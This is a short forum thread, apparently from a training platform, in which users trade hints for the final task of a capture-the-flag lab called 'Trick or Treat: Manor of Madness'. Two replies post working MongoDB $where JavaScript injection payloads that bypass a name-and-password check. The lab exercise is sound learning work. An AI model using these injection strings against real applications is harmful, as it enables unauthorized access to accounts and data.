Forum Discussion
immervivesolver
2 months agoBronze III
Trick or Treat: Manor of Madness
Any hints or close payloads for last task
- 2 months ago
This should nudge you in the right direction - MongoDB $where operator JavaScript injection - Web Application Vulnerabilities | Invicti
PRABAKARANRAMAMURTHY
2 months agoBronze III
Hi Samh051,
This query worked for you in the last question?
immervivesolver
2 months agoBronze III
{“$where":"this.name == ‘admin’||’1’==‘1’&& this.incantation == ‘admin’||’1’==‘1’“}
PRABAKARANRAMAMURTHY
- PRABAKARANRAMAMURTHY2 months agoBronze III
Thank you immervivesolver.
This worked:
{"$where":"this.name=='admin'||'1==1' && this.incantation =='admin'||'1==1'"}